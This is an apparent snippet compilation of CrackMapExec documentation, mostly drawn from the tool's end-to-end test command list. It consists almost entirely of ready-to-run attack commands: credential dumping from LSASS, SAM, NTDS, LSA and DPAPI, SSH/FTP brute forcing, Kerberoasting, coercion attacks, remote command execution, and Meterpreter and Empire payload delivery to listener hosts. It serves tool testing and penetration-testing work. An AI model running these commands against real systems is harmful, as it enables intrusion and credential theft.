### Install CrackMapExec Source: https://github.com/get-adpen/crackmapexec/blob/main/README.md Clone the repository and run the main script to install and start using CrackMapExec. Ensure you have Python 3 installed. ```shell git clone https://github.com/byt3n33dl3/CrackMapExec cd CrackMapExec python3 crackmapexec ``` -------------------------------- ### Execute Install Elevated SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'install_elevated' module to attempt to install a service with elevated privileges via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M install_elevated ``` -------------------------------- ### Execute Get NetConnections SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'get_netconnections' module to retrieve network connections on a target via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get_netconnections ``` -------------------------------- ### Run Unit Tests with Pytest Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/README.md Execute unit tests using pytest. Ensure CrackMapExec is installed in a virtual environment or via Poetry. ```bash pytest ``` ```bash poetry run pytest ``` -------------------------------- ### Basic SMB Connection Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Establishes a basic SMB connection to a target host using provided credentials. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS ``` -------------------------------- ### Enumerate SMB Shares Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Connects to a target host via SMB and lists available shares. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --shares ``` -------------------------------- ### Execute CrackMapExec SMB Module: scuffy (name and cleanup) Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'scuffy' module, specifying a name and enabling cleanup. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy -o NAME=test CLEANUP=True ``` -------------------------------- ### Execute CrackMapExec SMB Module: rdp (options) Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Execute the 'rdp' module with general options. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp --options ``` -------------------------------- ### List Available SMB Modules Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Lists all available modules that can be executed against SMB targets. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L ``` -------------------------------- ### Execute CrackMapExec SMB Module: scuffy (server and name) Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'scuffy' module, specifying the server and a name for the operation. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test ``` -------------------------------- ### Execute CrackMapExec SMB Module: rdp (enable) Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'rdp' module to enable Remote Desktop Protocol. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable ``` -------------------------------- ### RDP Module Execution Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Enable RDP on a target host using the SMB protocol, then test RDP connectivity. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable ``` ```bash crackmapexec rdp TARGET_HOST -u USERNAME -p PASSWORD KERBEROS ``` ```bash crackmapexec rdp TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --nla-screenshot ``` -------------------------------- ### Execute CrackMapExec SMB Module: nanodump Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Employ the 'nanodump' module for dumping credentials. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump ``` -------------------------------- ### Execute HandleKatz SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'handlekatz' module to extract credentials using Mimikatz via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz ``` -------------------------------- ### Configure HandleKatz SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'handlekatz' module with custom options, such as specifying the Mimikatz executable name. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz -o HANDLEKATZ_EXE_NAME="hk.exe" ``` -------------------------------- ### Execute CrackMapExec SMB Module: ntdsutil Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Leverage the 'ntdsutil' module for interacting with NTDS.dit. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntdsutil ``` -------------------------------- ### Execute CrackMapExec SMB Module: petitpotam Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Employ the 'petitpotam' module for PetitPotam exploits. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M petitpotam ``` -------------------------------- ### Execute CrackMapExec SMB Module: runasppl Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'runasppl' module for tasks related to RunAsPPL. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M runasppl ``` -------------------------------- ### Execute IoxidResolver SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'ioxidresolver' module to resolve I/O Object Identifiers on a target via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver ``` -------------------------------- ### Execute CrackMapExec SMB Module: reg-query Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'reg-query' module to query registry keys. Specify the full path to the key and the desired key name. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M reg-query -o PATH=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion KEY=DevicePath ``` -------------------------------- ### Execute CrackMapExec SMB Module: msol Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'msol' module for Microsoft Online services interactions. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M msol ``` -------------------------------- ### Execute CrackMapExec SMB Module: procdump Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'procdump' module to dump process memory. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M procdump ``` -------------------------------- ### Execute CrackMapExec SMB Module: slinky (name and cleanup) Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'slinky' module, specifying a name and enabling cleanup. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky -o NAME=test CLEANUP=True ``` -------------------------------- ### Configure Drop-SC SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'drop-sc' module with specific options, such as setting CLEANUP to True. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc -o CLEANUP=True ``` -------------------------------- ### Execute CrackMapExec SMB Module: shadowcoerce Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'shadowcoerce' module for Shadow Coerce operations. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce ``` -------------------------------- ### Execute CrackMapExec SMB Module: slinky (server and name) Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'slinky' module, specifying the server and a name for the operation. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky -o SERVER=127.0.0.1 NAME=test ``` -------------------------------- ### Execute DFSCcoerce SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'dfscoerce' module against an SMB target. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M dfscoerce ``` -------------------------------- ### Execute CrackMapExec SMB Module: ntlmv1 Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'ntlmv1' module to check for NTLMv1 vulnerabilities. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntlmv1 ``` -------------------------------- ### Enumerate SMB Computers Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Lists computers in the domain accessible via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --computers ``` -------------------------------- ### Execute GPP Autologin SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'gpp_autologin' module to retrieve Group Policy Preferences autologon credentials via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin ``` -------------------------------- ### Enumerate Logged-on Users via SMB Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Lists users currently logged on to a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --loggedon-users ``` -------------------------------- ### Enumerate SMB Users Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Lists local users on a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --users ``` -------------------------------- ### Configure Enum DNS SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'enum_dns' module with specific options, such as specifying a domain. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns -o DOMAIN=google.com ``` -------------------------------- ### Execute Empire Exec SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'empire_exec' module, specifying a listener. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener ``` -------------------------------- ### Execute CrackMapExec SMB Module: ms17-010 Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Utilize the 'ms17-010' module to check for the EternalBlue vulnerability. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ms17-010 ``` -------------------------------- ### Execute CrackMapExec SMB Module: nopac Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'nopac' module to check for PAC vulnerabilities. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nopac ``` -------------------------------- ### Execute CrackMapExec SMB Module: rdcman Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'rdcman' module for Remote Desktop Connection Manager related tasks. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdcman ``` -------------------------------- ### FTP Module Execution and Brute-forcing Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Interact with FTP targets, including listing directories and brute-forcing credentials using user and password lists. ```bash crackmapexec ftp TARGET_HOST -u USERNAME -p PASSWORD ``` ```bash crackmapexec ftp TARGET_HOST -u USERNAME -p PASSWORD --ls ``` ```bash crackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce ``` ```bash crackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success ``` ```bash crackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt ``` -------------------------------- ### Execute Command via SMB (Psexec) Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes a command on a target host using the Psexec-like functionality of CrackMapExec over SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -x whoami ``` -------------------------------- ### Enumerate SMB Groups Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Lists local groups on a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --groups ``` -------------------------------- ### Execute Obfuscated Empire Exec SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'empire_exec' module with obfuscation enabled, specifying a listener. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener OBFUSCATE=True ``` -------------------------------- ### Execute SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes a specific module against an SMB target. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M bh_owned ``` -------------------------------- ### Execute GPP Password SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'gpp_password' module to retrieve Group Policy Preferences passwords via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_password ``` -------------------------------- ### Enumerate SMB Disks Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Lists available disk shares on a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --disks ``` -------------------------------- ### Perform Kerberos Attacks with CrackMapExec Source: https://github.com/get-adpen/crackmapexec/blob/main/README.md Use these commands to perform AS-REP roasting and Kerberoasting attacks using CrackMapExec. Ensure you have the necessary credentials and target information. ```shell cme kerberos -u -p --asreproast ``` ```shell cme kerberos -u -p --kerberoast ``` -------------------------------- ### Execute Enum AV SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'enum_av' module to enumerate antivirus information on a target via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_av ``` -------------------------------- ### Enumerate Local SMB Groups Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Lists local groups on a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --local-groups ``` -------------------------------- ### Execute Firefox SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'firefox' module to extract Firefox credentials from a target via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M firefox ``` -------------------------------- ### Execute Enum DNS SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'enum_dns' module to enumerate DNS information on a target via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns ``` -------------------------------- ### Execute Drop-SC SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'drop-sc' module against an SMB target. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc ``` -------------------------------- ### Enumerate SMB Sessions Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Lists active SMB sessions on a target host. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --sessions ``` -------------------------------- ### Execute Command via SMB (Remote Shell) Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes a command on a target host and returns its output via SMB, similar to a remote shell. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami ``` -------------------------------- ### Execute CrackMapExec SMB Module: met_inject Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'met_inject' module for remote code execution. Specify the server host and port, and a random identifier. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345 ``` -------------------------------- ### Execute Obfuscated Command via SMB Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes a command on a target host via SMB with obfuscation enabled. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs ``` -------------------------------- ### Execute CrackMapExec SMB Module: rdp (disable) Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'rdp' module to disable Remote Desktop Protocol. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable ``` -------------------------------- ### Generate SMB Relay List Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Generates a list of hosts susceptible to SMB relay attacks and saves it to a file. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --gen-relay-list /tmp/relaylistOutputFilename.txt ``` -------------------------------- ### Execute CrackMapExec SMB Module: lsassy Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Use the 'lsassy' module to extract credentials from LSASS memory. Ensure you replace TARGET_HOST, USERNAME, and PASSWORD with actual values. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M lsassy ``` -------------------------------- ### Execute WMI Query via SMB Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes a Windows Management Instrumentation (WMI) query on a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --wmi "select Name from win32_computersystem" ``` -------------------------------- ### Execute Impersonate SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'impersonate' module to impersonate users on a target via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M impersonate ``` -------------------------------- ### Execute Hash Spider SMB Module Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Executes the 'hash_spider' module to find password hashes on a target via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M hash_spider ``` -------------------------------- ### Run End-to-End Tests Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/README.md Execute end-to-end tests for CrackMapExec. Requires target IP, username, and password. The `--errors` flag can be used to display full error output. ```bash python tests/e2e_tests.py -t $IP -u $USER -p $PASS ``` ```bash poetry run python tests/e2e_tests.py -t $IP -u $USER -p $PASS ``` ```bash python tests/e2e_tests.py -t $IP -u $USER -p $PASS --errors ``` -------------------------------- ### SSH Authentication and Brute-forcing Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Connect to SSH targets using password or key-based authentication. Supports user lists and password files for brute-forcing. ```bash crackmapexec ssh TARGET_HOST -u USERNAME -p PASSWORD ``` ```bash crackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce ``` ```bash crackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success ``` ```bash crackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt ``` ```bash crackmapexec ssh TARGET_HOST -u USERNAME -p PASSWORD --key-file data/test_key.priv ``` ```bash crackmapexec ssh TARGET_HOST -u USERNAME -p '' --key-file data/test_key.priv ``` -------------------------------- ### Check SMB Password Policy Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Retrieves the password policy information from a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --pass-pol ``` -------------------------------- ### Dump SMB SAM Database Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Attempts to dump the Security Account Manager (SAM) database from a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --sam ``` -------------------------------- ### MSSQL Module Execution Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Execute CrackMapExec modules against MSSQL targets. Use -M to specify the module and -o for module-specific options. ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD -M empire_exec ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345 ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject --options ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M mssql_priv ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M mssql_priv --options ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump --options ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection --options ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options ``` ```bash crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle ``` -------------------------------- ### Filter SMB Shares Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Lists SMB shares on a target host, filtering for specific access types like READ or WRITE. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE ``` -------------------------------- ### SMB Local Authentication Check Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Checks for local authentication bypass possibilities on a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --local-auth ``` -------------------------------- ### Dump SMB DPAPI Secrets Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Attempts to dump Data Protection API (DPAPI) secrets from a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --dpapi ``` -------------------------------- ### Dump SMB NTDS Database Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Attempts to dump the NTDS.DIT file (Active Directory database) from a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --ntds ``` -------------------------------- ### Dump SMB LSA Secrets Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Attempts to dump Local Security Authority (LSA) secrets from a target host via SMB. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --lsa ``` -------------------------------- ### SMB RID Brute Force Source: https://github.com/get-adpen/crackmapexec/blob/main/tests/e2e_commands.txt Performs a Relative Identifier (RID) brute-force attack against a target host via SMB to enumerate users. ```bash crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --rid-brute ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.